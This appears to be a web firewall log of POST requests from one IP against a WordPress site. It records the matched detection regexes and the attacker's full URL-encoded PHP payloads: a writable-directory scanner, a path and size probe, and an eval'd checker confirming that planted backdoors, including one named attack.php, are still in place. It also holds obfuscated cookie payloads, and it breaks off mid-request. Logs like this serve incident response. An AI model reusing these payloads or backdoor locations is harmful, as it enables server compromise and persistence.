3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvL08vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOupzkyK3Ein2IhplV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1\nsec-fetch-dest:document\ncontent-length:3339\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\n\ncO=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 13:20:34","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> lR:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvoSVvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWznJ5xVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nsec-fetch-dest:document\ncontent-length:3339\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\n\nlR=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 15:46:38","213.209.159.254","POST","\/wp-admin\/network\/plugins.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Io:%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B","POST \/wp-admin\/network\/plugins.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\nsec-ch-ua:\"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36\nsec-fetch-dest:document\ncontent-length:250\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=730da3e67a08a749df0620450f4abf2e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvFJ8vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAlMJS0MJDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-encoding:gzip,deflate\nsec-fetch-user:?1\n\nIo=%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B"]
["2026-05-16 15:51:04","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> lX:%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B","POST \/ HTTP\/1.1\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvoStvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWdqKA0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-length:250\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\nhost:dewenlabels.com\n\nlX=%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B"]
["2026-05-16 16:16:59","213.209.159.254","POST","\/wp-includes\/class-wp-term.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> CmArqm:eval(rawurldecode(\"%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%2C%0A%22\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php%22%3D%3E%22bd%40%40320334952%40%4033%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20\"));","POST \/wp-includes\/class-wp-term.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-platform:\"Windows\"\ncontent-length:4951\nsec-fetch-site:none\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\nhost:dewenlabels.com\nsec-fetch-mode:navigate\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-fetch-dest:document\nsec-fetch-user:?1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?0\n\nCmArqm=eval(rawurldecode(\"%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%2C%0A%22\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php%22%3D%3E%22bd%40%40320334952%40%4033%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20\"));"]
["2026-05-16 16:19:20","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> yM:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%2